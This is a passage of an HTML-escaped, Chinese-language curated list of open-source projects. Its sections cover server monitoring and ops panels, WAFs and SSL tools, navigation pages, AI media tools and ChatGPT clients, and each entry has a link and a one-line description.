            &lt;a href=&quot;https://github.com/naiba/nezha&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;nezha&lt;/a&gt; - 开源、轻量、易用的服务器监控、运维工具。&lt;a href=&quot;https://ops.naibahq.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://nezha.wiki/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/tianshiyeben/wgcloud&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;wgcloud&lt;/a&gt; - 极简&amp;amp;高效的主机监控系统。&lt;a href=&quot;http://101.35.223.197:9999/dash/main&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://www.wgstart.com/docs.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/statping-ng/statping-ng&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;statping-ng&lt;/a&gt; - 针对任何类型项目的 &lt;code&gt;Web&lt;/code&gt; 和应用程序状态监控。&lt;a href=&quot;https://statping-ng.github.io/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dromara/orion-visor&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;orion-visor&lt;/a&gt; - 一款现代化、高颜值的一站式智能运维管理平台。&lt;a href=&quot;https://dv.orionsec.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://visor.orionsec.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/welliamcao/OpsManage&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;OpsManage&lt;/a&gt; - 一款代码部署、应用部署、计划任务、设备资产管理平台。&lt;a href=&quot;http://42.194.214.22:8000/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/opendevops-cn/opendevops&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;opendevops&lt;/a&gt; - 一款为用户提供企业多混合云、一站式 &lt;code&gt;DevOps&lt;/code&gt;、自动化运维、完全开源的云管理平台、自动化运维平台。&lt;a href=&quot;https://demo.opendevops.cn/login&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/cppla/ServerStatus&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ServerStatus&lt;/a&gt; - 云探针、多服务器探针、云监控、多服务器云监控。&lt;a href=&quot;https://tz.cloudcpp.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/digitalocean/nginxconfig.io&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;nginxconfig.io&lt;/a&gt; - &lt;code&gt;Nginx&lt;/code&gt; 可视化配置工具。 &lt;a href=&quot;https://docs.digitalocean.com/products/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/monitoring-platform/phoenix&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;phoenix&lt;/a&gt; - 一个灵活可配置的开源监控平台，主要用于监控应用程序、服务器、&lt;code&gt;Docker&lt;/code&gt;、数据库、网络、&lt;code&gt;TCP&lt;/code&gt; 端口和 &lt;code&gt;HTTP&lt;/code&gt; 接口。&lt;a href=&quot;https://124.222.235.43:8443/phoenix-ui/index&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/lollipopkit/flutter_server_box&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;flutter_server_box&lt;/a&gt; - 使用 &lt;code&gt;Flutter&lt;/code&gt; 开发的 &lt;code&gt;Linux&lt;/code&gt; 服务器工具箱，提供服务器状态图表和管理工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/0xJacky/nginx-ui&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;nginx-ui&lt;/a&gt; - &lt;code&gt;Nginx&lt;/code&gt; 网络管理界面。&lt;a href=&quot;https://demo.nginxui.com&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/chaos-zhu/easynode&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;easynode&lt;/a&gt; - 一个 &lt;code&gt;Linux&lt;/code&gt; 服务器 &lt;code&gt;Web SSH&lt;/code&gt; 面板。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ClementTsang/bottom&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;bottom&lt;/a&gt; - 跨平台终端系统监控工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/sqshq/sampler&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;sampler&lt;/a&gt; - 一款基于 &lt;code&gt;Shell&lt;/code&gt; 命令的可视化监控工具。&lt;a href=&quot;https://sampler.dev/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/donknap/dpanel&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dpanel&lt;/a&gt; - &lt;code&gt;Docker&lt;/code&gt; 可视化面板系统。&lt;a href=&quot;https://demo.dpanel.cc/dpanel/ui/home&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://doc.dpanel.cc/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/louislam/dockge&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dockge&lt;/a&gt; - 一个精美、易于使用、自托管的 &lt;code&gt;Docker&lt;/code&gt; 管理工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/henrygd/beszel&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;beszel&lt;/a&gt; - 轻量易用的服务器监控。&lt;a href=&quot;https://beszel.dev/zh/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jesseduffield/lazydocker&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;lazydocker&lt;/a&gt; - 基于 &lt;code&gt;Go&lt;/code&gt; 实现的 &lt;code&gt;Docker&lt;/code&gt; 和 &lt;code&gt;Docker-Compose&lt;/code&gt; 的简单终端 &lt;code&gt;UI&lt;/code&gt; 工具。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;网络项目&quot;&gt;
    &lt;a href=&quot;?id=%e7%bd%91%e7%bb%9c%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;网络项目&quot;&gt;网络项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/chaitin/SafeLine&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;SafeLine&lt;/a&gt; - 一款足够简单、足够好用、足够强的免费 &lt;code&gt;WAF&lt;/code&gt;。&lt;a href=&quot;https://demo.waf-ce.chaitin.cn:9443/dashboard&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Lissy93/web-check&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;web-check&lt;/a&gt; - 用于分析任何网站的一体化网站 &lt;code&gt;OSINT&lt;/code&gt; 工具。&lt;a href=&quot;https://web-check.as93.net/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/usual2970/certimate&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;certimate&lt;/a&gt; - 开源的 &lt;code&gt;SSL&lt;/code&gt; &lt;strong&gt;证书管理工具&lt;/strong&gt;，可以帮助你自动申请、部署 &lt;code&gt;SSL&lt;/code&gt; 证书，并在证书即将过期时自动续期。&lt;a href=&quot;https://docs.certimate.me/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/samwafgo/SamWaf&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;SamWaf&lt;/a&gt; - 一款开源轻量级的网站&lt;strong&gt;应用防火墙&lt;/strong&gt;。&lt;a href=&quot;https://doc.samwaf.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dromara/domain-admin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;domain-admin&lt;/a&gt; - 域名 &lt;code&gt;SSL&lt;/code&gt; 证书监测平台、&lt;code&gt;SSL&lt;/code&gt; 证书申请自动续签。&lt;a href=&quot;https://mouday.github.io/domain-admin-web/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://domain-admin.readthedocs.io/zh-cn/latest/index.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ehang-io/nps&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;nps&lt;/a&gt; - 一款轻量级、高性能、功能强大的内网穿透代理服务器。&lt;a href=&quot;https://ehang-io.github.io/nps/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;导航页项目&quot;&gt;
    &lt;a href=&quot;?id=%e5%af%bc%e8%88%aa%e9%a1%b5%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;导航页项目&quot;&gt;导航页项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Pintree-io/pintree&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;pintree&lt;/a&gt; - 通过简单的几步操作，就可以将书签转换成一个美观且易用的导航页面。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hslr-s/sun-panel&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;sun-panel&lt;/a&gt; - 一个服务器、&lt;code&gt;NAS&lt;/code&gt; 导航面板、&lt;code&gt;Homepage&lt;/code&gt;、浏览器首页。&lt;a href=&quot;http://sunpaneldemo.enianteam.com/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://doc.sun-panel.top/zh_cn/introduce/project.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/geeeeeeeek/web_tool&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;web_tool&lt;/a&gt; - 静态响应式网址导航网站，全静态 &lt;code&gt;Html&lt;/code&gt; 页面，一键部署安装。&lt;a href=&quot;https://geeeeeeeek.github.io/web_tool/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/bastienwirtz/homer&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;homer&lt;/a&gt; - 一个简单而强大的个人主页生成器，适合用来展示你的各种服务和链接。&lt;a href=&quot;https://homer-demo.netlify.app/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/pawelmalak/flame&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;flame&lt;/a&gt; - 个人导航页。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;ai-项目&quot;&gt;
    &lt;a href=&quot;?id=ai-%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;ai-项目&quot;&gt;&lt;code&gt;AI&lt;/code&gt; 项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/replicate/scribble-diffusion&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;scribble-diffusion&lt;/a&gt; - &lt;code&gt;AI&lt;/code&gt; 绘图程序，将草图变成精美的图片。&lt;a href=&quot;https://scribblediffusion.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/SawyerHood/draw-a-ui&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;draw-a-ui&lt;/a&gt; - 绘制一个模型并为其生成 &lt;code&gt;HTML&lt;/code&gt;.
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/upscayl/upscayl&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;upscayl&lt;/a&gt; - 适用于 &lt;code&gt;Linux&lt;/code&gt;、&lt;code&gt;MacOS&lt;/code&gt; 和 &lt;code&gt;Windows&lt;/code&gt; 的免费开源 &lt;code&gt;AI&lt;/code&gt; 图像放大器。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/thunlp/WantWords&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;WantWords&lt;/a&gt; - 支持中文及跨语言查询的开源在线反向词典。&lt;a href=&quot;https://wantwords.net/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/GoogleChromeLabs/squoosh&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;squoosh&lt;/a&gt; - 一款图像压缩 &lt;code&gt;Web&lt;/code&gt; 应用程序，可通过多种格式减小图像大小。&lt;a href=&quot;https://squoosh.app/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/nagadomi/waifu2x&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;waifu2x&lt;/a&gt; - 一款放大图片工具。&lt;a href=&quot;https://waifu2x.udp.jp/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/myshell-ai/OpenVoice&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;OpenVoice&lt;/a&gt; - 语音克隆工具。&lt;a href=&quot;https://www.lepton.ai/playground/openvoice&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/leptonai/search_with_lepton&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;search_with_lepton&lt;/a&gt; - 使用 &lt;code&gt;Lepton AI&lt;/code&gt; 构建基于对话的快速搜索。&lt;a href=&quot;https://search.lepton.run/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Portkey-AI/gateway&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;gateway&lt;/a&gt; - 超快的 &lt;code&gt;AI&lt;/code&gt; 网关，通过统一简单的 &lt;code&gt;API&lt;/code&gt;，让用户轻松快速接入 100 多种大语言模型。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/levihsu/OOTDiffusion&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;OOTDiffusion&lt;/a&gt; - 虚拟服装试穿工具。&lt;a href=&quot;https://ootd.ibot.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/FujiwaraChoki/MoneyPrinter&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;MoneyPrinter&lt;/a&gt; - 一款可以自动创建带有配乐及字幕的短视频工具！
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/YunYouJun/ai-sfc&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ai-sfc&lt;/a&gt; - 一款借助 &lt;code&gt;AI&lt;/code&gt; 服务生成春联的开源工具。&lt;a href=&quot;https://ai-sfc.yunyoujun.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/harry0703/MoneyPrinterTurbo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;MoneyPrinterTurbo&lt;/a&gt; - 利用大模型，一键生成短视频。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wandb/openui&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;openui&lt;/a&gt; - 网页构建工具。&lt;a href=&quot;https://openui.fly.dev/ai/new&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/chidiwilliams/buzz&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;buzz&lt;/a&gt; - 基于大模型的音频转文字工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/lllyasviel/Fooocus&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Fooocus&lt;/a&gt; - 一款基于 &lt;code&gt;Gradio&lt;/code&gt; 的图像生成软件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/netease-youdao/EmotiVoice&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;EmotiVoice&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/netease-youdao/EmotiVoice?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/netease-youdao/EmotiVoice?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/netease-youdao/EmotiVoice?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/netease-youdao/EmotiVoice?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/netease-youdao/EmotiVoice&quot; data-origin=&quot;https://img.shields.io/github/license/netease-youdao/EmotiVoice&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/netease-youdao/EmotiVoice&quot; data-origin=&quot;https://img.shields.io/github/last-commit/netease-youdao/EmotiVoice&quot; alt=&quot;&quot;/&gt; - 一个支持多语音和提示控制的开源 &lt;code&gt;TTS&lt;/code&gt; 引擎。&lt;a href=&quot;https://replicate.com/bramhooimeijer/emotivoice&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/k4yt3x/video2x&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;video2x&lt;/a&gt; - 视频、&lt;code&gt;Gif&lt;/code&gt; 和图像无损放大工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/philz1337x/clarity-upscaler&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;clarity-upscaler&lt;/a&gt; - 开源 &lt;code&gt;AI&lt;/code&gt; 图像放大与增强工具。&lt;a href=&quot;https://clarityai.co/dashboard&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/opendatalab/MinerU&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;MinerU&lt;/a&gt; - 一站式开源高质量数据提取工具，支持 &lt;code&gt;PDF&lt;/code&gt;/网页/多格式电子书提取。&lt;a href=&quot;https://opendatalab.com/docs/datasets/?channel=datasets&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Zeyi-Lin/HivisionIDPhotos&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;HivisionIDPhotos&lt;/a&gt; - 一个轻量级的AI证件照制作算法。&lt;a href=&quot;https://swanhub.co/ZeYiLin/HivisionIDPhotos/demo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jianchang512/clone-voice&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;clone-voice&lt;/a&gt; - 一个带 &lt;code&gt;Web&lt;/code&gt; 界面的&lt;strong&gt;声音克隆工具&lt;/strong&gt;，使用你的音色或任意声音来录制音频。&lt;a href=&quot;https://tts.pyvideotrans.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://pyvideotrans.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Byaidu/PDFMathTranslate&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;PDFMathTranslate&lt;/a&gt; - 基于 &lt;code&gt;AI&lt;/code&gt; 完整保留排版的 &lt;code&gt;PDF&lt;/code&gt; 文档全文双语翻译，支持 &lt;code&gt;Google/DeepL/Ollama/OpenAI&lt;/code&gt; 等服务，提供 &lt;code&gt;CLI&lt;/code&gt;/&lt;code&gt;GUI&lt;/code&gt;/&lt;code&gt;Docker&lt;/code&gt;. &lt;a href=&quot;https://pdf2zh.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/idootop/MagicMirror&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;MagicMirror&lt;/a&gt; - 一键 &lt;code&gt;AI&lt;/code&gt; 换脸、发型、穿搭，发现更美的自己。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;chatgpt-项目&quot;&gt;
    &lt;a href=&quot;?id=chatgpt-%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;chatgpt-项目&quot;&gt;&lt;code&gt;ChatGPT&lt;/code&gt; 项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/sparticleinc/chatgpt-google-summary-extension&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;chatgpt-google-summary-extension&lt;/a&gt; - 一个开源的 &lt;code&gt;ChatGPT&lt;/code&gt; 总结扩展，适用于 &lt;code&gt;YouTube&lt;/code&gt;、&lt;code&gt;Google&lt;/code&gt;、&lt;code&gt;Twitter&lt;/code&gt; 和任何网页。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/bclswl0827/ChatGemini&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ChatGemini&lt;/a&gt; - 一个基于 &lt;code&gt;Google Gemini&lt;/code&gt; 的网页客户端，对标 &lt;code&gt;ChatGPT 3.5&lt;/code&gt;，操作逻辑同 &lt;code&gt;ChatGPT 3.5&lt;/code&gt; 一致，同时支持在聊天中上传图片，应用会自动调用 &lt;code&gt;Gemini-Pro-Vision&lt;/code&gt; 模型进行识图。&lt;a href=&quot;http://ibcl.us/ChatGemini/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
